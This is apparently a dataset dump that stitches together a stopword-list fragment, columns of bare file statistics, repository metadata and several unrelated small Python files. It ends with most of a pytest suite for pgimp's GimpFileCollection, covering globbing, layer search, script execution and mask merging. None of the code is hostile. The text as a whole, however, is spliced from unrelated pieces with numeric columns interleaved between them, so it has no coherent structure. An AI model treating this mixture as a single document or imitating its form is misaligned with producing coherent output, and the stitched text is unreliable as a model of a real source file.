three",u"through",u"throughout",u"thru",u"thus",u"to",u"together",u"too",u"took",u"toward",u"towards",u"tried",u"tries",u"truly",u"try",u"trying",u"twice",u"two",u"u",u"un",u"under",u"unfortunately",u"unless",u"unlikely",u"until",u"unto",u"up",u"upon",u"us",u"use",u"used",u"useful",u"uses",u"using",u"usually",u"uucp",u"v",u"value",u"various",u"very",u"via",u"viz",u"vs",u"w",u"want",u"wants",u"was",u"wasn't",u"way",u"we",u"we'd",u"we'll",u"we're",u"we've",u"welcome",u"well",u"went",u"were",u"weren't",u"what",u"what's",u"whatever",u"when",u"whence",u"whenever",u"where",u"where's",u"whereafter",u"whereas",u"whereby",u"wherein",u"whereupon",u"wherever",u"whether",u"which",u"while",u"whither",u"who",u"who's",u"whoever",u"whole",u"whom",u"whose",u"why",u"will",u"willing",u"wish",u"with",u"within",u"without",u"won't",u"wonder",u"would",u"wouldn't",u"x",u"y",u"yes",u"yet",u"you",u"you'd",u"you'll",u"you're",u"you've",u"your",u"yours",u"yourself",u"yourselves",u"z",u"zero"]}
| 8,068.714286
| 112,534
| 0.63964
| 27,469
| 112,962
| 2.658997
| 0.402344
| 0.002848
| 0.003368
| 0.003341
| 0.053916
| 0.023289
| 0.022043
| 0.012746
| 0.012527
| 0.006079
| 0
| 0.000293
| 0.001824
| 112,962
| 13
| 112,535
| 8,689.384615
| 0.640436
| 0.000912
| 0
| 0
| 0
| 2.25
| 0.649119
| 0.365785
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.125
| 0.375
| 0
| 0.375
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 6
|
f937303cbe2bd1ca99e6bfd681984ef1eb1f4844
| 35
|
py
|
Python
|
first-homework.py
|
Hexotical/Astr119
|
34a638d29f33c8fde9245cd7c5869bf3f9e7366b
|
[
"MIT"
] | null | null | null |
first-homework.py
|
Hexotical/Astr119
|
34a638d29f33c8fde9245cd7c5869bf3f9e7366b
|
[
"MIT"
] | 2
|
2020-10-01T18:51:01.000Z
|
2020-10-06T14:15:37.000Z
|
first-homework.py
|
Hexotical/astr-119
|
34a638d29f33c8fde9245cd7c5869bf3f9e7366b
|
[
"MIT"
] | null | null | null |
print("Lukas Ho, pronouns: he/him")
| 35
| 35
| 0.714286
| 6
| 35
| 4.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 35
| 1
| 35
| 35
| 0.78125
| 0
| 0
| 0
| 0
| 0
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
f97b2f6c294156a507ee4e398ae4a7d90fba5ed9
| 240
|
py
|
Python
|
world_state.py
|
puskini33/Calculator
|
79cc0021e8c9b5235d6c57c2d721deb254d73a33
|
[
"MIT"
] | null | null | null |
world_state.py
|
puskini33/Calculator
|
79cc0021e8c9b5235d6c57c2d721deb254d73a33
|
[
"MIT"
] | null | null | null |
world_state.py
|
puskini33/Calculator
|
79cc0021e8c9b5235d6c57c2d721deb254d73a33
|
[
"MIT"
] | null | null | null |
class WorldState(object):
def __init__(self):
self.variables = {}
def clone(self):
temporary_world_state = WorldState()
temporary_world_state.variables = self.variables
return temporary_world_state
| 24
| 56
| 0.675
| 25
| 240
| 6.08
| 0.48
| 0.276316
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.245833
| 240
| 9
| 57
| 26.666667
| 0.839779
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
f99c7dc6ce29a2ffb9fe2abe6759971a3c9cf033
| 214
|
py
|
Python
|
cogkge/data/processor/fb15k237processor.py
|
jinzhuoran/CogKGE
|
b0e819a1d34cf61a7d70c33808da3377b73c8fd6
|
[
"MIT"
] | 18
|
2022-01-22T09:52:57.000Z
|
2022-03-22T15:02:12.000Z
|
cogkge/data/processor/fb15k237processor.py
|
CogNLP/CogKGE
|
70d851d6489600c1e90eb25b0388a3ceba2f078c
|
[
"MIT"
] | null | null | null |
cogkge/data/processor/fb15k237processor.py
|
CogNLP/CogKGE
|
70d851d6489600c1e90eb25b0388a3ceba2f078c
|
[
"MIT"
] | null | null | null |
from .baseprocessor import BaseProcessor
class FB15K237Processor(BaseProcessor):
def __init__(self, node_lut, relation_lut, reprocess):
super().__init__("FB15K237", node_lut, relation_lut, reprocess)
| 30.571429
| 71
| 0.771028
| 23
| 214
| 6.652174
| 0.608696
| 0.091503
| 0.196078
| 0.235294
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 0.135514
| 214
| 6
| 72
| 35.666667
| 0.772973
| 0
| 0
| 0
| 0
| 0
| 0.037383
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
f9d3e8e17cb4d7f9fe9db4b44a63b0c8a9f8f65f
| 323
|
py
|
Python
|
test/suite/E27.py
|
shardros/autopep8
|
2ab2ea74668b10f3910f3d5b9526494fa5671ca1
|
[
"MIT"
] | 3,459
|
2015-01-03T15:53:43.000Z
|
2022-03-31T16:33:01.000Z
|
test/suite/E27.py
|
hayata-yamamoto/autopep8
|
107e29dce22c7b367a36633a78735278e4ad4288
|
[
"MIT"
] | 435
|
2015-01-03T12:58:44.000Z
|
2022-03-29T12:37:13.000Z
|
test/suite/E27.py
|
hayata-yamamoto/autopep8
|
107e29dce22c7b367a36633a78735278e4ad4288
|
[
"MIT"
] | 279
|
2015-03-16T16:34:51.000Z
|
2022-03-26T23:58:48.000Z
|
#: Okay
True and False
#: E271
True and False
#: E272
True and False
#: E271
if 1:
#: E273
True and False
#: E273 E274
True and False
#: E271
a and b
#: E271
1 and b
#: E271
a and 2
#: E271 E272
1 and b
#: E271 E272
a and 2
#: E272
this and False
#: E273
a and b
#: E274
a and b
#: E273 E274
this and False
| 10.419355
| 15
| 0.613003
| 63
| 323
| 3.142857
| 0.222222
| 0.282828
| 0.30303
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.257642
| 0.291022
| 323
| 30
| 16
| 10.766667
| 0.606987
| 0.340557
| 0
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ddb88819c796db53b08989fe1a656955b84d1760
| 140
|
py
|
Python
|
application/blueprints/user/__init__.py
|
demetrius-mp/flask-template
|
2dbab372bf2d7d5ff60af430c4b69c95a41cd681
|
[
"MIT"
] | null | null | null |
application/blueprints/user/__init__.py
|
demetrius-mp/flask-template
|
2dbab372bf2d7d5ff60af430c4b69c95a41cd681
|
[
"MIT"
] | 2
|
2021-10-14T02:00:15.000Z
|
2021-10-14T02:19:44.000Z
|
application/blueprints/user/__init__.py
|
demetrius-mp/flask-template
|
2dbab372bf2d7d5ff60af430c4b69c95a41cd681
|
[
"MIT"
] | null | null | null |
from flask import Flask
from application.blueprints.user.routes import users
def init_app(app: Flask):
app.register_blueprint(users)
| 17.5
| 52
| 0.792857
| 20
| 140
| 5.45
| 0.65
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135714
| 140
| 7
| 53
| 20
| 0.900826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0
| 0.75
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
34a5f721af5cc589bff5b78d011f713fac9b79a1
| 211
|
py
|
Python
|
smoothie/plugins/__init__.py
|
PiterPentester/smoothie
|
810709273c3d7bb975aca1f44062d39d0b33b678
|
[
"0BSD"
] | 1
|
2021-02-12T00:24:45.000Z
|
2021-02-12T00:24:45.000Z
|
smoothie/plugins/__init__.py
|
PiterPentester/smoothie
|
810709273c3d7bb975aca1f44062d39d0b33b678
|
[
"0BSD"
] | 1
|
2021-03-26T00:37:50.000Z
|
2021-03-26T00:37:50.000Z
|
smoothie/plugins/__init__.py
|
PiterPentester/smoothie
|
810709273c3d7bb975aca1f44062d39d0b33b678
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python
from smoothie.plugins.interfaces import run as interfaces
from smoothie.plugins.list_networks import run as list_networks
from smoothie.plugins.target_network import run as target_network
| 35.166667
| 65
| 0.848341
| 32
| 211
| 5.46875
| 0.46875
| 0.205714
| 0.325714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099526
| 211
| 5
| 66
| 42.2
| 0.921053
| 0.094787
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
34b1459af9f8293d45f8ba2c83ea76abe97d3d5b
| 102
|
py
|
Python
|
core/src/autogluon/core/scheduler/resource/__init__.py
|
zhiqiangdon/autogluon
|
71ee7ef0f05d8f0aad112d8c1719174aa33194d9
|
[
"Apache-2.0"
] | 4,462
|
2019-12-09T17:41:07.000Z
|
2022-03-31T22:00:41.000Z
|
core/src/autogluon/core/scheduler/resource/__init__.py
|
zhiqiangdon/autogluon
|
71ee7ef0f05d8f0aad112d8c1719174aa33194d9
|
[
"Apache-2.0"
] | 1,408
|
2019-12-09T17:48:59.000Z
|
2022-03-31T20:24:12.000Z
|
core/src/autogluon/core/scheduler/resource/__init__.py
|
zhiqiangdon/autogluon
|
71ee7ef0f05d8f0aad112d8c1719174aa33194d9
|
[
"Apache-2.0"
] | 623
|
2019-12-10T02:04:18.000Z
|
2022-03-20T17:11:01.000Z
|
from .resource import *
from .dist_manager import *
from ...utils import get_cpu_count, get_gpu_count
| 25.5
| 49
| 0.794118
| 16
| 102
| 4.75
| 0.625
| 0.263158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127451
| 102
| 3
| 50
| 34
| 0.853933
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
34ea6bc99bdf93d5fbca0d7c5dabe8656d17800e
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/poetry/core/packages/constraints/union_constraint.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/poetry/core/packages/constraints/union_constraint.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/poetry/core/packages/constraints/union_constraint.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/a5/a1/10/06eab95524f667caa51362a09c577fd5f6d45980e5390034745c0a322f
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.46875
| 0
| 96
| 1
| 96
| 96
| 0.427083
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
34f2d98b52c7839e3432965351129274c2ecd039
| 23,904
|
py
|
Python
|
pgimp/GimpFileCollectionTest.py
|
netogallo/pgimp
|
bb86254983e1673d702e1fa2ed207166fd15ec65
|
[
"MIT"
] | 5
|
2018-10-29T10:09:37.000Z
|
2020-12-28T04:47:32.000Z
|
pgimp/GimpFileCollectionTest.py
|
netogallo/pgimp
|
bb86254983e1673d702e1fa2ed207166fd15ec65
|
[
"MIT"
] | 1
|
2020-10-21T18:35:44.000Z
|
2021-06-17T06:27:26.000Z
|
pgimp/GimpFileCollectionTest.py
|
netogallo/pgimp
|
bb86254983e1673d702e1fa2ed207166fd15ec65
|
[
"MIT"
] | 4
|
2019-09-20T05:14:39.000Z
|
2021-04-05T01:55:47.000Z
|
# Copyright 2018 Mathias Burger <[email protected]>
#
# SPDX-License-Identifier: MIT
import os
import shutil
import textwrap
from tempfile import TemporaryDirectory
import numpy as np
import pytest
from pgimp.GimpFile import GimpFile, GimpFileType
from pgimp.GimpFileCollection import GimpFileCollection, NonExistingPathComponentException, \
GimpMissingRequiredParameterException, MaskForegroundColor
from pgimp.util import file
from pgimp.util.TempFile import TempFile
from pgimp.util.string import escape_single_quotes
def test_create_from_pathname_with_file():
prefix = file.relative_to(__file__, 'test-resources/files/')
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/first'))
assert len(collection.get_files()) == 1
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/first.xcf'))
assert len(collection.get_files()) == 1
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/first.png'))
assert len(collection.get_files()) == 0
assert '' == collection.get_prefix()
def test_create_from_pathname_with_directory():
prefix = file.relative_to(__file__, 'test-resources/files/')
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files'))
assert len(collection.get_files()) == 2
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/'))
assert len(collection.get_files()) == 2
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/*'))
assert len(collection.get_files()) == 2
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/*.xcf'))
assert len(collection.get_files()) == 2
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/*.png'))
assert len(collection.get_files()) == 0
assert '' == collection.get_prefix()
def test_create_from_pathname_with_recursive_match():
prefix = file.relative_to(__file__, 'test-resources/files/')
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**'))
assert len(collection.get_files()) == 4
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**/'))
assert len(collection.get_files()) == 4
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**/*'))
assert len(collection.get_files()) == 4
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**/*.xcf'))
assert len(collection.get_files()) == 4
assert prefix == collection.get_prefix()
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**/*.png'))
assert len(collection.get_files()) == 0
assert '' == collection.get_prefix()
def test_ordering():
prefix = file.relative_to(__file__, 'test-resources/files/')
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**'))
collection = collection.replace_prefix(prefix)
assert [
'first.xcf',
'second.xcf',
'a/third.xcf',
'a/b/fourth.xcf',
] == collection.get_files()
def test_replace_path_components():
prefix = file.relative_to(__file__, 'test-resources/files/')
suffix = '.xcf'
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**'))
collection = collection.replace_path_components(prefix, '#', suffix, '%')
assert [
'#first%.xcf',
'#second%.xcf',
'#a/third%.xcf',
'#a/b/fourth%.xcf',
] == collection.get_files()
def test_replace_path_components_with_non_existing_component():
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**'))
with pytest.raises(NonExistingPathComponentException):
collection.replace_path_components('wrong_prefix', '#')
def test_replace_path_components_without_replacements():
collection = GimpFileCollection.create_from_pathname(file.relative_to(__file__, 'test-resources/files/**'))
files_before = collection.get_files()
collection = collection.replace_path_components()
files_after = collection.get_files()
assert files_before == files_after
def test_find_files_containing_layer_by_predictate():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
files = collection.find_files_containing_layer_by_predictate(
lambda layers: 'White' in map(lambda layer: layer.name, layers)
)
assert len(files) == 1
assert with_white == files[0]
files = collection.find_files_containing_layer_by_predictate(
lambda layers: 'Not existing' in map(lambda layer: layer.name, layers)
)
assert len(files) == 0
def test_find_files_containing_layer_by_name():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
files = collection.find_files_containing_layer_by_name('White', timeout_in_seconds=10)
assert len(files) == 1
assert with_white == files[0]
files = collection.find_files_containing_layer_by_name('Not existing', timeout_in_seconds=10)
assert len(files) == 0
def test_find_files_by_script_with_script_that_takes_single_file():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
script = textwrap.dedent(
"""
from pgimp.gimp.file import open_xcf
from pgimp.gimp.parameter import return_bool
image = open_xcf('__file__')
for layer in image.layers:
if layer.name == '{0:s}':
return_bool(True)
return_bool(False)
"""
)
files = collection.find_files_by_script(script.format(escape_single_quotes('White')), timeout_in_seconds=3)
assert len(files) == 1
assert with_white == files[0]
files = collection.find_files_by_script(script.format(escape_single_quotes('Not existing')), timeout_in_seconds=3)
assert len(files) == 0
def test_find_files_by_script_with_script_that_takes_multiple_files():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
script = textwrap.dedent(
"""
import gimp
from pgimp.gimp.file import XcfFile
from pgimp.gimp.parameter import return_json, get_json
files = get_json('__files__')
matches = []
for file in files:
with XcfFile(file) as image:
for layer in image.layers:
if layer.name == '{0:s}':
matches.append(file)
return_json(matches)
"""
)
files = collection.find_files_by_script(script.format(escape_single_quotes('White')), timeout_in_seconds=3)
assert len(files) == 1
assert with_white == files[0]
files = collection.find_files_by_script(script.format(escape_single_quotes('Not existing')), timeout_in_seconds=3)
assert len(files) == 0
def test_find_files_by_script_without_required_parameters():
collection = GimpFileCollection([])
script = textwrap.dedent(
"""
print(1)
"""
)
with pytest.raises(GimpMissingRequiredParameterException):
collection.find_files_by_script(script, timeout_in_seconds=3)
def test_execute_script_and_return_json_with_script_that_takes_single_file():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
script = textwrap.dedent(
"""
from pgimp.gimp.file import open_xcf
from pgimp.gimp.parameter import return_json
image = open_xcf('__file__')
for layer in image.layers:
if layer.name == '{0:s}':
return_json(True)
return_json(False)
"""
)
files = collection.execute_script_and_return_json(script.format(escape_single_quotes('White')), timeout_in_seconds=3)
assert {
with_white: True,
without_white: False,
} == files
def test_execute_script_and_return_json_with_script_that_takes_multiple_files_using_open():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
script = textwrap.dedent(
"""
import gimp
from pgimp.gimp.file import open_xcf
from pgimp.gimp.parameter import return_json, get_json
files = get_json('__files__')
matches = []
for file in files:
image = open_xcf(file)
for layer in image.layers:
if layer.name == '{0:s}':
matches.append(file)
gimp.pdb.gimp_image_delete(image)
return_json(matches)
"""
)
files = collection.execute_script_and_return_json(script.format(escape_single_quotes('White')), timeout_in_seconds=3)
assert len(files) == 1
assert with_white == files[0]
def test_execute_script_and_return_json_with_script_that_takes_multiple_files_using_xcf_file():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white)\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
script = textwrap.dedent(
"""
import gimp
from pgimp.gimp.file import XcfFile
from pgimp.gimp.parameter import return_json, get_json
files = get_json('__files__')
matches = []
for file in files:
with XcfFile(file) as image:
for layer in image.layers:
if layer.name == '{0:s}':
matches.append(file)
return_json(matches)
"""
)
files = collection.execute_script_and_return_json(script.format(escape_single_quotes('White')), timeout_in_seconds=3)
assert len(files) == 1
assert with_white == files[0]
def test_execute_script_and_return_json_with_script_that_takes_multiple_files_using_for_each():
with TempFile('.xcf') as with_white, TempFile('.xcf') as without_white:
GimpFile(with_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8) * 255)
GimpFile(without_white) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('Black', np.zeros(shape=(1, 1), dtype=np.uint8))
collection = GimpFileCollection([with_white, without_white])
script = textwrap.dedent(
"""
from pgimp.gimp.file import for_each_file
from pgimp.gimp.parameter import return_json, get_json
matches = []
def layer_matches(image, file):
for layer in image.layers:
if layer.name == '{0:s}':
matches.append(file)
for_each_file(layer_matches)
return_json(matches)
"""
)
files = collection.execute_script_and_return_json(script.format(escape_single_quotes('White')),
timeout_in_seconds=3)
assert len(files) == 1
assert with_white == files[0]
def test_copy_layer_from():
with TemporaryDirectory('_src') as srcdir, TemporaryDirectory('_dst') as dstdir:
src_1 = GimpFile(os.path.join(srcdir, 'file1.xcf'))\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))\
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
src_2 = GimpFile(os.path.join(srcdir, 'file2.xcf'))\
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('White', np.ones(shape=(1, 1), dtype=np.uint8)*255)
dst_1 = GimpFile(os.path.join(dstdir, 'file1.xcf')) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8)) \
.add_layer_from_numpy('White', np.zeros(shape=(1, 1), dtype=np.uint8)*255)
dst_2 = GimpFile(os.path.join(dstdir, 'file2.xcf')) \
.create('Background', np.zeros(shape=(1, 1), dtype=np.uint8))
src_collection = GimpFileCollection([src_1.get_file(), src_2.get_file()])
dst_collection = GimpFileCollection([dst_1.get_file(), dst_2.get_file()])
dst_collection.copy_layer_from(src_collection, 'White', layer_position=1, timeout_in_seconds=10)
assert np.all(dst_1.layer_to_numpy('White') == 255)
assert ['Background', 'White'] == dst_1.layer_names()
assert 'White' in dst_2.layer_names()
assert np.all(dst_2.layer_to_numpy('White') == 255)
assert ['Background', 'White'] == dst_2.layer_names()
def test_merge_mask_layer_from_with_grayscale_and_foreground_color_white():
with TemporaryDirectory('_src') as srcdir, TemporaryDirectory('_dst') as dstdir:
src_1 = GimpFile(os.path.join(srcdir, 'file1.xcf'))\
.create('Mask', np.array([[255, 0]], dtype=np.uint8))
dst_1 = GimpFile(os.path.join(dstdir, 'file1.xcf')) \
.create('Mask', np.array([[0, 255]], dtype=np.uint8))
dst_2 = GimpFile(os.path.join(dstdir, 'file2.xcf')) \
.create('Mask', np.array([[0, 255]], dtype=np.uint8))
src_collection = GimpFileCollection([src_1.get_file()])
dst_collection = GimpFileCollection([dst_1.get_file(), dst_2.get_file()])
dst_collection.merge_mask_layer_from(src_collection, 'Mask', MaskForegroundColor.WHITE, timeout_in_seconds=10)
assert np.all(dst_1.layer_to_numpy('Mask') == [[255], [255]])
assert ['Mask'] == dst_1.layer_names()
assert 'Mask' in dst_2.layer_names()
assert np.all(dst_2.layer_to_numpy('Mask') == [[0], [255]])
assert ['Mask'] == dst_2.layer_names()
def test_merge_mask_layer_from_with_grayscale_and_foreground_color_black():
with TemporaryDirectory('_src') as srcdir, TemporaryDirectory('_dst') as dstdir:
src_1 = GimpFile(os.path.join(srcdir, 'file1.xcf'))\
.create('Mask', np.array([[255, 0]], dtype=np.uint8))
dst_1 = GimpFile(os.path.join(dstdir, 'file1.xcf')) \
.create('Mask', np.array([[0, 255]], dtype=np.uint8))
dst_2 = GimpFile(os.path.join(dstdir, 'file2.xcf')) \
.create('Mask', np.array([[0, 255]], dtype=np.uint8))
src_collection = GimpFileCollection([src_1.get_file()])
dst_collection = GimpFileCollection([dst_1.get_file(), dst_2.get_file()])
dst_collection.merge_mask_layer_from(src_collection, 'Mask', MaskForegroundColor.BLACK, timeout_in_seconds=10)
assert np.all(dst_1.layer_to_numpy('Mask') == [[0], [0]])
assert ['Mask'] == dst_1.layer_names()
assert 'Mask' in dst_2.layer_names()
assert np.all(dst_2.layer_to_numpy('Mask') == [[0], [255]])
assert ['Mask'] == dst_2.layer_names()
def test_merge_mask_layer_from_with_color():
with TemporaryDirectory('_src') as srcdir, TemporaryDirectory('_dst') as dstdir:
